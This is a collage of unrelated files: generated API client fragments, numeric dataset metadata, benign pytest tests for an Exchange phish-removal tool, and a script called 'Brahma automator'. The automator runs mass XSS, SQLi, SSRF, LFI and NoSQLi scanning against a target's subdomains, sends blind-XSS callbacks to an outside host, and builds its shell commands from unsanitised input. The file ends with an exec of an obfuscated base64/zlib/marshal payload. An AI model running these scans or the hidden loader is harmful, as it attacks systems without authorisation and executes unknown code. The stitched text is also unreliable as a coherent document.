"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.update_custom_symbol_type_order_endpoint.call_with_http_info(**kwargs)
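# Usage sketch (hedged): every *_with_http_info_async variant returns an
# ApplyResult wrapping the (data, status, headers) tuple; .get() blocks and
# re-raises any exception raised in the worker. The dto is an illustrative
# ReorderCustomSymbolTypeDto instance, not a value taken from this file:
#
#     future = api.update_custom_symbol_type_order_with_http_info_async(
#         reorder_custom_symbol_type_dto=dto)
#     data, status, headers = future.get()
#     assert status == 200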
| 45.485048
| 125
| 0.588855
| 8,477
| 76,051
| 5.087531
| 0.027014
| 0.060102
| 0.071973
| 0.035059
| 0.962715
| 0.95075
| 0.944791
| 0.942356
| 0.935864
| 0.9274
| 0
| 0.003326
| 0.351567
| 76,051
| 1,671
| 126
| 45.512268
| 0.871213
| 0.57589
| 0
| 0.679749
| 1
| 0
| 0.17603
| 0.094255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047096
| false
| 0
| 0.023548
| 0
| 0.11617
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc7cef5e47c4ef3b36b8c1a5a35e958897c1bda8
| 13,085
|
py
|
Python
|
tests/saq/test_phishfry.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 24
|
2019-09-21T21:09:45.000Z
|
2022-03-15T19:48:13.000Z
|
tests/saq/test_phishfry.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 54
|
2019-09-16T20:06:30.000Z
|
2021-08-18T22:22:08.000Z
|
tests/saq/test_phishfry.py
|
ace-ecosystem/ACE
|
d17b5ef4bccf923ec6be5115fabe40f0627dab2d
|
[
"Apache-2.0"
] | 9
|
2019-09-08T13:35:55.000Z
|
2021-01-03T15:23:37.000Z
|
import pytest
from saq.phishfry import *
from tests.saq.requests import mock_site
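# Note on the mocking contract (inferred from usage below; mock_site's source
# is not shown here): each site_map entry registers one requests_mock response
# for its method/url pair. request_file/response_file name XML fixtures under
# datadir, response_text supplies a literal body instead, status_code sets the
# mocked HTTP status, and headers carries values such as X-AnchorMailbox
# (whether matched against the request or attached to the response depends on
# mock_site itself).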
@pytest.mark.parametrize('address, mailbox_address, mailbox_type, site_map', [
('jdoe@company.com', 'jdoe@company.com', 'Mailbox', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response.xml',
},
]),
])
@pytest.mark.integration
def test_find_mailbox(datadir, requests_mock, address, mailbox_address, mailbox_type, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = phishfry.find_mailbox(address)
assert mailbox.email_address == mailbox_address
assert mailbox.mailbox_type == mailbox_type
@pytest.mark.parametrize('address, exception, message, site_map', [
('jdoe@company.com', ErrorUnsupportedMailboxType, 'unsupported mailbox type: GroupMailbox', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response_group.xml',
},
]),
('jdoe@company.com', ErrorUnsupportedMailboxType, 'unsupported mailbox type: PublicDL', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response_public_dl.xml',
},
]),
('jdoe@company.com', ErrorNonExistentMailbox, 'mailbox does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response_no_results.xml',
},
]),
('jdoe@company.com', Exception, 'failed to find mailbox: ErrorUnknown', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response_error.xml',
},
]),
('jdoe@company.com', requests.exceptions.HTTPError, 'Server Error', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 500,
'request_file': 'find_mailbox_request.xml',
'response_file': 'find_mailbox_response_error.xml',
},
]),
('jdoe@company.com', Exception, 'ResponseCode not found', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_mailbox_request.xml',
'response_text': 'no response',
},
]),
])
@pytest.mark.integration
def test_find_mailbox_error(datadir, requests_mock, address, exception, message, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
with pytest.raises(exception) as e:
phishfry.find_mailbox(address)
assert message in str(e.value)
@pytest.mark.parametrize('site_map', [
([
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_folder_request.xml',
'response_file': 'find_folder_response.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_find_folder(datadir, requests_mock, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = phishfry.find_folder(mailbox, 'AllItems')
assert folder.folder_id == 'TestId'
@pytest.mark.parametrize('exception, message, site_map', [
(ErrorNonExistentMessage, 'message does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_folder_request.xml',
'response_file': 'find_folder_response_no_results.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(ErrorNonExistentMailbox, 'mailbox does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_folder_request.xml',
'response_file': 'find_folder_response_no_mailbox.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(Exception, 'failed to find folder: ErrorUnknown', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_folder_request.xml',
'response_file': 'find_folder_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(requests.exceptions.HTTPError, 'Server Error', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 500,
'request_file': 'find_folder_request.xml',
'response_file': 'find_folder_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_find_folder_error(datadir, requests_mock, exception, message, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
with pytest.raises(exception) as e:
phishfry.find_folder(mailbox, 'AllItems')
assert message in str(e.value)
@pytest.mark.parametrize('site_map', [
([
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_item_request.xml',
'response_file': 'find_item_response.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_find_item(datadir, requests_mock, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'TestId')
item = phishfry.find_item(folder, '<test>')
assert item.item_id == 'item_id'
@pytest.mark.parametrize('exception, message, site_map', [
(ErrorNonExistentMessage, 'message does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_item_request.xml',
'response_file': 'find_item_response_no_results.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(Exception, 'failed to find item: ErrorUnknown', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'find_item_request.xml',
'response_file': 'find_item_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(requests.exceptions.HTTPError, 'Server Error', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 500,
'request_file': 'find_item_request.xml',
'response_file': 'find_item_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_find_item_error(datadir, requests_mock, exception, message, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'TestId')
with pytest.raises(exception) as e:
phishfry.find_item(folder, '<test>')
assert message in str(e.value)
@pytest.mark.parametrize('site_map', [
([
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'remove_request.xml',
'response_file': 'remove_response.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_delete(datadir, requests_mock, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'folder_id')
item = Item(folder, 'item_id')
phishfry.delete(item, 'SoftDelete')
@pytest.mark.parametrize('exception, message, site_map', [
(Exception, 'failed to remove item: ErrorUnknown', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'remove_request.xml',
'response_file': 'remove_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(requests.exceptions.HTTPError, 'Server Error', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 500,
'request_file': 'remove_request.xml',
'response_file': 'remove_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(ErrorNonExistentMessage, 'message does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'remove_request.xml',
'response_file': 'remove_response_not_found.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_delete_error(datadir, requests_mock, exception, message, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'folder_id')
item = Item(folder, 'item_id')
with pytest.raises(exception) as e:
phishfry.delete(item, 'SoftDelete')
assert message in str(e.value)
@pytest.mark.parametrize('site_map', [
([
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'restore_request.xml',
'response_file': 'restore_response.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_move(datadir, requests_mock, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'folder_id')
item = Item(folder, 'item_id')
phishfry.move(item, 'inbox')
@pytest.mark.parametrize('exception, message, site_map', [
(ErrorNonExistentMessage, 'message does not exist', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'restore_request.xml',
'response_file': 'restore_response_not_found.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(Exception, 'failed to restore item: ErrorUnknown', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 200,
'request_file': 'restore_request.xml',
'response_file': 'restore_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
(requests.exceptions.HTTPError, 'Server Error', [
{
'method': 'POST',
'url': 'https://server/EWS/Exchange.asmx',
'status_code': 500,
'request_file': 'restore_request.xml',
'response_file': 'restore_response_error.xml',
'headers': {"X-AnchorMailbox": 'jdoe@company.com'},
},
]),
])
@pytest.mark.integration
def test_move_error(datadir, requests_mock, exception, message, site_map):
mock_site(requests_mock, datadir, site_map)
phishfry = Phishfry('server', 'Exchange2010_SP2')
mailbox = Mailbox('jdoe@company.com', 'Mailbox')
folder = Folder(mailbox, 'folder_id')
item = Item(folder, 'item_id')
with pytest.raises(exception) as e:
phishfry.move(item, 'inbox')
assert message in str(e.value)
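# All tests above carry the integration marker; assuming the marker is
# registered in the project's pytest configuration, a typical selective run is:
#
#     pytest -m integration tests/saq/test_phishfry.py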
| 37.385714
| 97
| 0.592052
| 1,347
| 13,085
| 5.533779
| 0.067558
| 0.048699
| 0.06198
| 0.057955
| 0.931446
| 0.914274
| 0.900054
| 0.852562
| 0.836464
| 0.836464
| 0
| 0.012504
| 0.254337
| 13,085
| 349
| 98
| 37.492837
| 0.75146
| 0
| 0
| 0.705015
| 0
| 0
| 0.393275
| 0.075048
| 0
| 0
| 0
| 0
| 0.026549
| 1
| 0.029499
| false
| 0
| 0.011799
| 0
| 0.041298
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bca2943ce5552fca2727b52e26b1f716b5d18d24
| 13,300
|
py
|
Python
|
Brahma/core/automator.py
|
DevanshRaghav75/Brahma
|
fe54a96bd968c7a0f44285ae6ed35fcfc8101816
|
[
"MIT"
] | 5
|
2021-07-12T05:08:35.000Z
|
2022-03-25T01:16:30.000Z
|
Brahma/core/automator.py
|
DevanshRaghav75/Brahma
|
fe54a96bd968c7a0f44285ae6ed35fcfc8101816
|
[
"MIT"
] | null | null | null |
Brahma/core/automator.py
|
DevanshRaghav75/Brahma
|
fe54a96bd968c7a0f44285ae6ed35fcfc8101816
|
[
"MIT"
] | null | null | null |
import time
import os
import re
from Brahma.core.args import target
from Brahma.core.colors import GREEN, YELLOW
from Brahma.core.styles import RESET, BRIGHT
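# Each automator below drives the same recon chain (subfinder -> httpx ->
# waybackurls -> gf) through os.system shell pipelines, then hands the filtered
# URL lists to a vulnerability-specific tool (dalfox, sqlmap, nosqli, ffuf).
# Because the target and user input are concatenated straight into shell
# strings, these helpers are only safe with trusted input; a hardened,
# subprocess-based sketch of the same chain is given at the end of this file.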
def xss():
print(BRIGHT + GREEN + "[*] " + RESET + "XSS will be automated using: gf, gf_patterns, waybackurls, subfinder, dalfox, httpx")
time.sleep(2)
print(BRIGHT + GREEN + "[*] " + RESET + "Finding subdomains using subfinder" )
print(BRIGHT + GREEN + "[*] " + RESET + "Making results directory")
os.system("mkdir results")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: subfinder -d " + target + " | tee results/domains.txt ")
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system("subfinder -d " + url + " | tee results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding working domains from results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/domains.txt | httpx | tee results/urls.alive")
time.sleep(3)
os.system("cat results/domains.txt | httpx | tee results/urls.alive")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding urls using waybackurls")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.alive | waybackurls | tee results/urls.final")
time.sleep(3)
os.system("cat results/urls.alive | waybackurls | tee results/urls.final")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding XSS urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf xss results/urls.final >> results/urls.xss")
time.sleep(3)
os.system("gf xss results/urls.final >> results/urls.xss")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding XSS using dalfox")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: dalfox -b hahwul.xss.ht file results/urls.xss")
time.sleep(3)
os.system("dalfox -b hahwul.xss.ht file results/urls.xss")
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
def sqli():
print(BRIGHT + GREEN + "[*] " + RESET + "SQLI will be automated using: gf, gf_patterns, waybackurls, subfinder, httpx, sqlmap")
time.sleep(2)
print(BRIGHT + GREEN + "[*] " + RESET + "Finding subdomains using subfinder" )
print(BRIGHT + GREEN + "[*] " + RESET + "Making results directory")
os.system("mkdir results")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: subfinder -d " + target + " | tee results/domains.txt ")
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system("subfinder -d " + url + " | tee results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding working domains from results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/domains.txt | httpx | tee results/urls.alive")
time.sleep(3)
os.system("cat results/domains.txt | httpx | tee results/urls.alive")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding urls using waybackurls")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.alive | waybackurls | tee results/urls.final")
time.sleep(3)
os.system("cat results/urls.alive | waybackurls | tee results/urls.final")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding sqli urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf sqli results/urls.final >> results/urls.sqli")
time.sleep(3)
os.system("gf sqli results/urls.final >> results/urls.sqli")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding sqli using sqlmap")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: sqlmap -m results/urls.sqli --dbs --batch --random-agent --level 5 --risk 3 --tamper=between")
time.sleep(3)
os.system("sqlmap -m results/urls.sqli --dbs --batch --random-agent --level 5 --risk 3 --tamper=between")
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
def ssrf():
print(BRIGHT + GREEN + "[*] " + RESET + "SSRF will be automated using: gf, gf_patterns, waybackurls, subfinder, httpx, qsreplace")
print(BRIGHT + YELLOW + "[NOTE] " + RESET + "This scan requires your burpcollaborator payload")
time.sleep(2)
print(BRIGHT + GREEN + "[*] " + RESET + "Finding subdomains using subfinder" )
print(BRIGHT + GREEN + "[*] " + RESET + "Making results directory")
os.system("mkdir results")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: subfinder -d " + target + " | tee results/domains.txt ")
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system("subfinder -d " + url + " | tee results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding working domains from results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/domains.txt | httpx | tee results/urls.alive")
time.sleep(3)
os.system("cat results/domains.txt | httpx | tee results/urls.alive")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding urls using waybackurls")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.alive | waybackurls | tee results/urls.final")
time.sleep(3)
os.system("cat results/urls.alive | waybackurls | tee results/urls.final")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding SSRF urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf ssrf results/urls.final >> results/urls.ssrf")
time.sleep(3)
os.system("gf ssrf results/urls.final >> results/urls.ssrf")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding ssrf using qsreplace, ffuf")
ssrf_collo = input("[>] Enter your burpcollaborator payload: ")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.ssrf | grep '=' | qsreplace http://" + ssrf_collo + " >> urls.ssrf.replaced")
time.sleep(3)
os.system("cat results/urls.ssrf | grep '=' | qsreplace http://" + ssrf_collo + " >> urls.ssrf.replaced")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding ssrf using ffuf")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: ffuf -c -w urls.ssrf.replaced -u FUZZ")
print(BRIGHT + GREEN + "[*] " + RESET + "Check your burpcollaborator, If there is any execution")
time.sleep(3)
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
def nosqli():
print(BRIGHT + GREEN + "[*] " + RESET + "NOSQLI will be automated using: gf, gf_patterns, waybackurls, subfinder, httpx, nosqli")
time.sleep(2)
print(BRIGHT + GREEN + "[*] " + RESET + "Finding subdomains using subfinder" )
print(BRIGHT + GREEN + "[*] " + RESET + "Making results directory")
os.system("mkdir results")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: subfinder -d " + target + " | tee results/domains.txt ")
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system("subfinder -d " + url + " | tee results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding working domains from results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/domains.txt | httpx | tee results/urls.alive")
time.sleep(3)
os.system("cat results/domains.txt | httpx | tee results/urls.alive")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding urls using waybackurls")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.alive | waybackurls | tee results/urls.final")
time.sleep(3)
os.system("cat results/urls.alive | waybackurls | tee results/urls.final")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding SQLi urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf sqli results/urls.final >> results/urls.nosqli")
time.sleep(3)
os.system("gf sqli results/urls.final >> results/urls.nosqli")
print(BRIGHT + GREEN + "[*] " + RESET + "Testing urls.nosqli one by one using for loops")
time.sleep(3)
with open('results/urls.nosqli') as wordlist:
read = wordlist.readlines()
for line in read:
os.system("nosqli scan -t " + line.strip())
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
def lfi():
word = input('[>] Enter your lfi payloads file: ')
print('')
print(BRIGHT + GREEN + '[*] ' + RESET + 'One by one all urls will be tested using ffuf so be patient this could take time.')
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system('subfinder -d ' + url + '| waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr "root:x" -w ' + word + ' ; done')
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
def all():
word = input('[>] Enter your lfi payloads file: ')
ssrf_collo = input("[>] Enter your burpcollaborator payload: ")
print(BRIGHT + GREEN + "[*] " + RESET + "Automating : XSS, SQLI, LFI, SSRF, NoSQLI")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding subdomains using subfinder" )
print(BRIGHT + GREEN + "[*] " + RESET + "Making results directory")
os.system("mkdir results")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: subfinder -d " + target + " | tee results/domains.txt ")
time.sleep(3)
if re.search('https://', target):
url = target.replace('https://', '')
else:
url = target.replace('http://', '')
os.system("subfinder -d " + url + " | tee results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding working domains from results/domains.txt")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/domains.txt | httpx | tee results/urls.alive")
time.sleep(3)
os.system("cat results/domains.txt | httpx | tee results/urls.alive")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding urls using waybackurls")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.alive | waybackurls | tee results/urls.final")
time.sleep(3)
os.system("cat results/urls.alive | waybackurls | tee results/urls.final")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding SSRF urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf ssrf results/urls.final >> results/urls.ssrf")
time.sleep(3)
os.system("gf ssrf results/urls.final >> results/urls.ssrf")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding XSS urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf xss results/urls.final >> results/urls.xss")
time.sleep(3)
os.system("gf xss results/urls.final >> results/urls.xss")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding sqli urls using gf and gf_patterns")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: gf sqli results/urls.final >> results/urls.sqli")
time.sleep(3)
os.system("gf sqli results/urls.final >> results/urls.sqli")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding XSS using dalfox")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: dalfox -b hahwul.xss.ht file results/urls.xss")
time.sleep(3)
os.system("dalfox -b hahwul.xss.ht file results/urls.xss")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding sqli using sqlmap")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: sqlmap -m results/urls.sqli --dbs --batch --random-agent --level 5 --risk 3 --tamper=between")
time.sleep(3)
os.system("sqlmap -m results/urls.sqli --dbs --batch --random-agent --level 5 --risk 3 --tamper=between")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding ssrf using qsreplace, ffuf")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: cat results/urls.ssrf | grep '=' | qsreplace http://" + ssrf_collo + " >> urls.ssrf.replaced")
time.sleep(3)
os.system("cat results/urls.ssrf | grep '=' | qsreplace http://" + ssrf_collo + " >> urls.ssrf.replaced")
print(BRIGHT + GREEN + "[*] " + RESET + "Finding ssrf using ffuf")
print(BRIGHT + GREEN + "[*] " + RESET + "Running command: ffuf -c -w urls.ssrf.replaced -u FUZZ")
print(BRIGHT + GREEN + "[*] " + RESET + "Check your burpcollaborator, If there is any execution")
time.sleep(3)
print(BRIGHT + GREEN + "[*] " + RESET + "Testing urls.nosqli one by one using for loops")
time.sleep(3)
with open ('results/urls.nosqli') as wordlist:
read = wordlist.readlines()
for line in read:
os.system("nosqli scan -t " + line)
print(BRIGHT + GREEN + '[*] ' + RESET + 'One by one all urls will be tested using ffuf so be patient this could take time.')
os.system('subfinder -d ' + url + '| waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr "root:x" -w ' + word + ' ; done')
print(BRIGHT + YELLOW + "[DONE] " + RESET + "All tasks done!")
| 56.837607
| 156
| 0.621353
| 1,678
| 13,300
| 4.91478
| 0.079261
| 0.110707
| 0.147448
| 0.193525
| 0.961926
| 0.948951
| 0.948951
| 0.940948
| 0.939493
| 0.910877
| 0
| 0.004278
| 0.209023
| 13,300
| 233
| 157
| 57.081545
| 0.779658
| 0
| 0
| 0.887805
| 0
| 0.029268
| 0.504663
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029268
| false
| 0
| 0.034146
| 0
| 0.063415
| 0.409756
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
bca441ec5f578797806578abb453f2b37edf7f38
| 6,177
|
py
|
Python
|
app/main.py
|
raohoney32/karachi
|
86092f1e5510a1a71f69412fac6cb2639bf8440c
|
[
"BSD-3-Clause"
] | 17
|
2021-01-06T16:47:18.000Z
|
2022-03-12T20:42:15.000Z
|
app/main.py
|
raohoney32/karachi
|
86092f1e5510a1a71f69412fac6cb2639bf8440c
|
[
"BSD-3-Clause"
] | null | null | null |
app/main.py
|
raohoney32/karachi
|
86092f1e5510a1a71f69412fac6cb2639bf8440c
|
[
"BSD-3-Clause"
] | 18
|
2021-01-07T01:59:57.000Z
|
2022-03-13T11:52:57.000Z
|
import marshal,zlib,base64
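# The single statement below unpacks and executes an opaque payload
# (base64 -> zlib -> marshal code object -> exec); nothing about the decoded
# bytecode can be verified from this file, so treat it as untrusted.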
exec(marshal.loads(zlib.decompress(base64.b64decode("eJxFWMfO7Dx2/O4/M04P4LUXXgyghXICbMMKrdDKraydcs5qpa0f3NYFxjZBHpAiRTCeqmL687fw5yf955NW5THZE3/9dD8/0f/lf/1Ev/43/8dP9MdP/vPT/Okn//XT/Pkn/+On+ctP9sfPf/36W3ya/dl9jP3XPz391f/9BH3N/vnnJ3+fgv8aTNqZ7OILbkk1hdShh6tYTjV1OR9Ou27QSNG0g9rp1lJS7RzS4CniJarqXn+5Y1njb56vC37ToCKR4IaS9AYnRA3oSVEsczGADggsID2pIJ2AIPqUn6QOE4jyDjgkDrhLT/n5FpkmFewmCJ4IDc4ZPRYlAR7g/nSLLnqBIuq3IAcTRKnOGLtPG3VtccLl5Yphb6kpUiXBQZLQUitani7XfGDgcUVRGwhsM87tm1/CvH5/B4zqcr+tugpTiN5njwSWLR01MBNNFYEoOUzpj1CXjpN9yRFTv1h2LeV9tJSiAREGHzk7e4blgBzi5m+4lDVFqlHg4G1MMD9uaYOlUUa0rLXC0rLxcoY124ry0SM0g/aBCKCmWwHiK3hTyRpyB/9qbHuMkY3WB4ra9aq6XxGnlnXvMEgeUqX3yT9CZJgHLtcHe3lrFzSnk+8RyiwA1Y4kK2UYfcPKPnwK3hUbZuPyrXrni6wQqhP1CzdIZtT3g1a6WKpcKhAOmmCk024AjOepniGv6iYuuSKeg8OA3ybtNcLh1yvGIAIGPqiF7aZxCMX2JpvqfQPAa7lbWY5sp4BgHsfFrzakPl5WzTeAN3zUeELiiTxL0Dem6ROQ1ohZMC0RrVM8QKTKYivWSTfaixnIVk4oZisMfUqENWOW2pXZK7sy4pQLdGVpe8cHvUIbmVNSywzHxxCJt4eFeoeSkR9XrDT